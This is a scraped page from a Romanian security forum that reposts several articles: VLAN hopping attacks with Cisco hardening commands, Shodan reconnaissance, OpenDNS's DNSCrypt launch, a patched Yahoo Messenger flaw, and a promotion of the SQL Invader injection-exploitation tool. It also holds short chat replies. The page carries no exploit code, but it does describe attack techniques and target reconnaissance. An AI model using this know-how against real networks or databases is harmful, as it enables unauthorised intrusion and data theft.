a method involves tagging transmitted frames with two 802.1q headers, one of the headers is used for Victim switch and another is used for the attacker’s switch. The simplest way to prevent a VLAN Hopping attack is by disabling Dynamic Trunk protocol (DTP) on all untrusted ports. For example: ciscoswitch# conf t ciscoswitc(config)# int gi1/10 ciscoswitch(config-if)# switchportnonegotiate From the example “switchportnonegotiate” disables the DTP. Double-Encapsulated 802.1Q IEEE 802.1Q helps to create smaller network out of large networks. A large network is very slow and consumes lot of bandwidth whereas a smaller network is easier to manage and consumes less bandwidth. So, it’s desirable to have a smaller network than a large complex network. IEEE802.1Q was developed as a part of IEEE802. To use IEEE802.1Q, it’s must that we implement Trunk. Suppose Trunk is enabled in IEEE802.1Q, a certain type of attack is performed on 802.1Q. This attack is called Double Encapsulation attack. It adds two tags to the original frame. In IEEE 802.1Q trunk always modify the frame by eliminating the outer tag but the inner tag remains permanently and it becomes the destination. To prevent Double-Encapsulation in 802.1Q, the native VLAN should not be assigned to any port. We must force traffic on trunk to always carry a tag. To make the trunk to carry a tag, we can use the command “Switch(config)# vlan dot1q tag native”. It is a global command to tag the native VLAN. Random Frame Stress Attack Random frame stress attack got many types but it’s generally a brute force attack performed on several fields. In this type of brute force attack the source address and destination address are kept constant. They are primarily performed to test the switch ability when it encounters abnormalities in inputs and calculations. Random frame stress attack can be prevented when a Private VLAN or PVLAN is used to separate the host from receiving those unwanted inputs. Using of Shodan for gathering information: This is just to find out the online devices using Shodan (http://www.shodanhq.com). Shodan stands for Sentient Hyper-Optimized Data Access Network which is almost similar to a normal search engine except for its results. Shodan grabs the banner of the devices and gives a detail information, thus helping the user while pen testing. The usage of shodan is simple and easy and also has shodan syntax for making the results more filtered. For example, to find a device or service running in the target, then the syntax would be “service name” hostname: target.com. Similarly we can discover more devices and making the analysis of the target easier and also reducing the time. Another example would be finding the L2 devices like for example Netgear GSM7212 L2 switch from a particular country. The image shows the Netgear switch from the country US. Similarly, we can find different devices for information gathering phase. Conclusion: I hope this helps understand various VLAN attacks and makes the concept simpler. On other hand, attacking a Vlan is tough. And never forget to change the default settings of your devices. A few points for the administrators would be: Manage switches in as secure a manner The native VLAN ID should not be used for trunking. Always use a dedicated VLAN ID for all trunk ports. Set all user ports to non trunking Do configure port-security feature in the switch for more protection. (Note: be careful about configuring the port-security feature.) Avoid using VLAN 1 Deploy port-security where possible for user ports Enable BPDU Guard for STP attack mitigation Use private VLAN where appropriate to further divide L2 networks If VTP is used, use MD5 authentication. Unused ports can be disabled. Sursa: http://resources.infosecinstitute.com/vlan-hacking/

[h=1]Introducing DNSCrypt (Preview Release)[/h] [h=2]Securing a critical piece of Internet infrastructure[/h] Backgound: The need for a better DNS security DNS is one of the fundamental building blocks of the Internet. It's used any time you visit a website, send an email, have an IM conversation or do anything else online. While OpenDNS has provided world-class security using DNS for years, and OpenDNS is the most secure DNS service available, the underlying DNS protocol has not been secure enough for our comfort. Many will remember the Kaminsky Vulnerability, which impacted nearly every DNS implementation in the world (though not OpenDNS). That said, the class of problems that the Kaminsky Vulnerability related to were a result of some of the underlying foundations of the DNS protocol that are inherently weak -- particularly in the "last mile." The "last mile" is the portion of your Internet connection between your computer and your ISP. DNSCrypt is our way of securing the "last mile" of DNS traffic and resolving (no pun intended) an entire class of serious security concerns with the DNS protocol. There have been numerous examples of tampering, or man-in-the-middle attacks, and snooping of DNS traffic at the last mile and it represents a serious security risk that we've always wanted to fix. Today we can. Why DNSCrypt is so significant In the same way the SSL turns HTTP web traffic into HTTPS encrypted Web traffic, DNSCrypt turns regular DNS traffic into encrypted DNS traffic that is secure from eavesdropping and man-in-the-middle attacks. It doesn't require any changes to domain names or how they work, it simply provides a method for securely encrypting communication between our customers and our DNS servers in our data centers. We know that claims alone don't work in the security world, however, so we've opened up the source to our DNSCrypt code base and it's available on GitHub. DNSCrypt has the potential to be the most impactful advancement in Internet security since SSL, significantly improving every single Internet user's online security and privacy. Download DNSCrypt! (mac only at the moment) Frequently Asked Questions (FAQ): 1. In plain English, what is DNSCrypt? DNSCrypt is a piece of lightweight software that everyone should use to boost online privacy and security. It works by encrypting all DNS traffic between the user and OpenDNS, preventing any spying, spoofing or man-in-the-middle attacks. 2. How can I use DNSCrypt today? DNSCrypt is immediately available as a technology preview. It should work, shouldn't cause problems, but we're still making iterative changes regularly. You can download it at the link above. Initially it's available for Mac, though we expect a PC version in the near future. Tips: The service is not configured to maintain state between reboots, it defaults to off when you reboot. This is only for early releases. Eventually we will have it maintain your preferences between reboots. If you have a firewall or other middleware mangling your packets, you should try enabling DNSCrypt with TCP over port 443. This will make most firewalls think it's HTTPS traffic and leave it alone. If you prefer reliability over security, enable fallback to insecure DNS. If you can't reach us, we'll try using your DHCP-assigned or previously configured DNS servers. This is a security risk though. 3. What about DNSSEC? Does this eliminate the need for DNSSEC? No. DNSCrypt and DNSSEC are complementary. DNSSEC does a number of things. First, it provides authentication. (Is the DNS record I'm getting a response for coming from the owner of the domain name I'm asking about or has it been tampered with?) Second, DNSSEC provides a chain of trust to help establish confidence that the answers you're getting are verifiable. But unfortunately, DNSSEC doesn't actually provide encryption for DNS records, even those signed by DNSSEC. Even if everyone in the word used DNSSEC, the need to encrypt all DNS traffic would not go away. Moreover, DNSSEC today represents a near-zero percentage of overall domain names and an increasingly smaller percentage of DNS records each day as the Internet grows. That said, DNSSEC and DNSCrypt can work perfectly together. They aren't conflicting in any way. Think of DNSCrypt as a wrapper around all DNS traffic and DNSSEC as a way of signing and providing validation for a subset of those records. There are benefits to DNSSEC that DNSCrypt isn't trying to address, in fact, we hope DNSSEC adoption grows so that people can have more confidence in the entire DNS infrastructure, not just the link between our customers and OpenDNS. 4. Is this using SSL? What's the crypto and what's the design? We are not using SSL. While we make the analogy that DNSCrypt is like SSL in that it wraps all DNS traffic with encryption the same way SSL wraps all HTTP traffic, it's not the crypto library being used. We're using elliptical-curve cryptography, in particular the Curve25519 eliptical curve. The design goals are similar to those described in the DNSCurve forwarder design. Sursa: http://www.opendns.com/technology/dnscrypt/

[h=1]Yahoo Closes Zero-Day YIM Hole[/h] 07 December 2011 Users in control of their status message again Earlier today we got an update from Yahoo that the issue we reported in a previous blog post has been fixed. As of the moment, YIM users running version 11.x of the instant messaging client are not vulnerable to the status-change mechanism anymore. If you are running a vulnerable version of the product (all releases in version 11, including the latest version of the kit), you should know that you don’t have to download and install anything, as the fix has been applied server-side. Bitdefender discovered the flaw last Friday as part of a forensic investigation on a customer’s machine. We immediately notified the affected vendor and other antivirus companies about the new threat and provided proof of concept code as basis for issuing a fix. Sursa: Yahoo Closes Zero-Day YIM Hole - MalwareCity : Computer Security Blog

NTO SQL Invader NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database. Easy to use - The tool’s GUI interface enables you to simply paste the injectable request found by a DAST tool or feed a detailed request straignt from an application scan report. You can then control how much information is harvested. Clearly presents evidence - Unlike tools that provide all data via command line, NTO SQL Invader provides the data in a organized manner that is useful for both executive meetings as well as technical analysis and remediation. Enables easy transport of logging data - All of the data harvested from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or POC. Video demo: http://www.ntobjectives.com/research/sqlinvader-intro Download: http://go.ntobjectives.com/e/8672/-18735-NTOSQLInvader-Setup-exe/EEOX/47243855 Mirror: http://www.multiupload.com/33KTSNSWI0 Sursa: http://go.ntobjectives.com/l/8672/2011-12-01/DRMN

[h=1]Spying Internet Explorer 8.0[/h] 28 September 2011 Author: Brian Mariani, Senior Security Auditor at High-Tech Bridge SA Malicious software also known as "Malcode" or "Malware" can compromise the security and functionality of a program. Once "installed" it monitors the user’s habits. This documents introduces this kind of threats by spying a widespread internet browser. PDF: Spying Internet Explorer 8.0 (1,5 MB) Project files (SpyingIE.zip) (150 kB) Sursa: https://www.htbridge.ch/publications/spying_internet_explorer_8_0.html Se poate mai usor, dar e mai "1337" asa.

Vorbele mascaricilor astia conteaza? Niciun om serios nu da 2 bani pe astia.

Si eu care credeam ca e "Offensive Security Certified Expert"... http://www.offensive-security.com/information-security-certifications/

Imediat bat din palme si se rezolva. Ma ocup de RST in timpul liber si dupa cum vedeti, in ultimele zile nu prea am avut timp liber. Daca azi-maine-seara nu am timp, rezolv in weekend, am mai multe de rezolvat, problema e ca nu dau 2 click-uri si gata, poof, se rezolva.